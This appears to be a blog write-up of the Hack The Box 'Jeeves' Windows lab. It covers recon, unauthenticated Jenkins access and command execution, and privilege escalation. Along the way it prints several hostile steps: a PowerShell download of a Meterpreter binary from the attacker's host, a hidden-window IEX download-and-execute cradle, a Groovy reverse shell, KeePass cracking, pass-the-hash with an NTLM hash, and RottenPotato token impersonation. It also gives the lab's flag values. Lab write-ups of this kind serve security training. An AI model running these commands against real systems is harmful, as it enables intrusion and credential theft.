Welcome to my blog where I write about Threat Hunting, Pentesting and Cybersecurity in general.
HTB Jeeves Windows
Recon
Nmap
PORT STATE SERVICE VERSION
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Ask Jeeves
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open http Jetty 9.4.z-SNAPSHOT
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
We use Dirbuster to find out the directories running on port 50000
/askjeeves/ has a Jekins app running
To get admin without authenticating:
http://10.10.10.63:50000/askjeeves/securityRealm/user/admin/
Exploitation Method 1
- On Jenkins create a new Item “Execute Windows bash command” and select “Freestyle Project”
- Select “Add building Step” and select “Execute Windows bash command”
- On the bash console type:
powershell wget "http://10.10.14.14/peterpreter.exe" -outfile "meterpreter.exe"
Start apache and place meterpreter.exe file for download Set up multi/handler Run the shell on jenkins
Privilege Escalation Method 1
- Download CEH.kdbx keepass file and use john2keepass to create a hashdump file
Crack the has using john format=KeePass and wordlist=rockyou.txt and we obtain the pass : CEH:moonshine1 to load the keepass backup file.
Install Keepass2 : apt-get install keepass2
We obtain the admin NTLM hash: aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 Using msf “windows smb” we connect using a pass the hash techique:
use exploit/windows/smb/psexec
msf exploit(windows/smb/psexec) > set rhost 10.10.10.63
msf exploit(windows/smb/psexec) > set smbuser administrator
msf exploit(windows/smb/psexec) > set smbpass aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
msf exploit(windows/smb/psexec) > set lport 8888
msf exploit(windows/smb/psexec) > exploit
There is an alternate data stream applied to the ROOT flag. to view flag
dir /R
more < hm.txt:root.txt
Exploitation Method 2
On Jenkins, create a reverser Groovy shell on the “script console” under “manage Jenkins” tab and run it
Set up an nc listener to recieve the shell and set up a meterpreter shell:
use exploit/multi/script/web_delivery
msf exploit(multi/script/web_delivery) > set target 2
msf exploit(multi/script/web_delivery) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) > set lhost 10.10.14.28
msf exploit(multi/script/web_delivery) > set srvhost 10.10.14.28
msf exploit(multi/script/web_delivery) > exploit
We paste the following generated code into the netcat listener and meterpreter session should be created
powershell.exe -nop -w hidden -c $B=new-object net.webclient;$B.proxy=[Net.WebRequest]::GetSystemWebProxy();$B.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $B.downloadstring('http://10.10.14.34:8080/MHGDnJdwHT');
powershell.exe -nop -w hidden -c $B=new-object net.webclient;$B.proxy=[Net.WebRequest]::GetSystemWebProxy();$B.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $B.downloadstring('http://10.10.14.34:8080/MHGDnJdwHT');
Privilege Escalation Method 2
We Use Windows Exploit Suggesters and we choose the Vuln MS16-075; we upload RottenPotato.exe to the target machine Then we load meterpretert incognito: load incognito We execute the rottenpotato.exe file Then we type:
impersonate_token "NT AUTHORITY\SYSTEM"
and finally we get root level access.
Flags
ROOT "afbc5bd4b615a60648cec41c6ac92530"
USER "e3232272596fb47950d59c4cf1e7066a"